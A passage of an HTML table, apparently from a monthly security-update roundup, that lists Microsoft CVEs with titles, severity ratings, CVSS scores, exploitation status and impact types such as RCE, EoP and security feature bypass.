  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45481"><span>CVE-2026-45481</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48560"><span>CVE-2026-48560</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48562"><span>CVE-2026-48562</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42835"><span>CVE-2026-42835</span></a></td>
  <td width="256" class="xl68">Microsoft Teams for
  Android Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45606"><span>CVE-2026-45606</span></a></td>
  <td width="256" class="xl68">Microsoft UxTheme
  Library (uxtheme.dll) Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45482"><span>CVE-2026-45482</span></a></td>
  <td width="256" class="xl68">Microsoft Visual
  Studio Code CoPilot Chat Extension Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45466"><span>CVE-2026-45466</span></a></td>
  <td width="256" class="xl68">Microsoft Word
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45471"><span>CVE-2026-45471</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45486"><span>CVE-2026-45486</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45643"><span>CVE-2026-45643</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45457"><span>CVE-2026-45457</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42980"><span>CVE-2026-42980</span></a></td>
  <td width="256" class="xl68">NT OS Kernel Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42916"><span>CVE-2026-42916</span></a></td>
  <td width="256" class="xl68">NT OS Kernel Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45649"><span>CVE-2026-45649</span></a></td>
  <td width="256" class="xl68">Office for Android
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47653"><span>CVE-2026-47653</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42909"><span>CVE-2026-42909</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42913"><span>CVE-2026-42913</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42993"><span>CVE-2026-42993</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45588"><span>CVE-2026-45588</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48568"><span>CVE-2026-48568</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48570"><span>CVE-2026-48570</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48573"><span>CVE-2026-48573</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48575"><span>CVE-2026-48575</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48576"><span>CVE-2026-48576</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48578"><span>CVE-2026-48578</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45654"><span>CVE-2026-45654</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45656"><span>CVE-2026-45656</span></a></td>
  <td width="256" class="xl68">UEFI Secure Boot
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-8863"><span>CVE-2026-8863</span></a></td>
  <td width="256" class="xl68">UEFI Secure Boot
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40376"><span>CVE-2026-40376</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47281"><span>CVE-2026-47281</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47284"><span>CVE-2026-47284</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47292"><span>CVE-2026-47292</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  MSSQL Extension Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48569"><span>CVE-2026-48569</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47287"><span>CVE-2026-47287</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Tampering Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42829"><span>CVE-2026-42829</span></a></td>
  <td width="256" class="xl68">Windows Administrator
  Protection Secure Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34335"><span>CVE-2026-34335</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45601"><span>CVE-2026-45601</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45598"><span>CVE-2026-45598</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45596"><span>CVE-2026-45596</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45638"><span>CVE-2026-45638</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45603"><span>CVE-2026-45603</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42911"><span>CVE-2026-42911</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45594"><span>CVE-2026-45594</span></a></td>
  <td width="256" class="xl68">Windows Application
  Identity (AppID) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45655"><span>CVE-2026-45655</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45658"><span>CVE-2026-45658</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45640"><span>CVE-2026-45640</span></a></td>
  <td width="256" class="xl68">Windows Bluetooth Port
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45605"><span>CVE-2026-45605</span></a></td>
  <td width="256" class="xl68">Windows Bluetooth
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47656"><span>CVE-2026-47656</span></a></td>
  <td width="256" class="xl68">Windows Boot Manager
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44809"><span>CVE-2026-44809</span></a></td>
  <td width="256" class="xl68">Windows Common Log
  File System Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45634"><span>CVE-2026-45634</span></a></td>
  <td width="256" class="xl68">Windows DHCP Client
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45608"><span>CVE-2026-45608</span></a></td>
  <td width="256" class="xl68">Windows DHCP Client
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41108"><span>CVE-2026-41108</span></a></td>
  <td width="256" class="xl68">Windows DNS Client
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42905"><span>CVE-2026-42905</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44811"><span>CVE-2026-44811</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44808"><span>CVE-2026-44808</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44807"><span>CVE-2026-44807</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42983"><span>CVE-2026-42983</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44802"><span>CVE-2026-44802</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44813"><span>CVE-2026-44813</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44804"><span>CVE-2026-44804</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48566"><span>CVE-2026-48566</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44814"><span>CVE-2026-44814</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45602"><span>CVE-2026-45602</span></a></td>
  <td width="256" class="xl68">Windows Dynamic Host
  Configuration Protocol (DHCP) Tampering Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42836"><span>CVE-2026-42836</span></a></td>
  <td width="256" class="xl68">Windows Function
  Discovery Service (fdwsd.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42910"><span>CVE-2026-42910</span></a></td>
  <td width="256" class="xl68">Windows Hotpatch
  Monitoring Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42972"><span>CVE-2026-42972</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45592"><span>CVE-2026-45592</span></a></td>
  <td width="256" class="xl68">Windows Internet
  (wininet.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42903"><span>CVE-2026-42903</span></a></td>
  <td width="256" class="xl68">Windows Kerberos
  Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
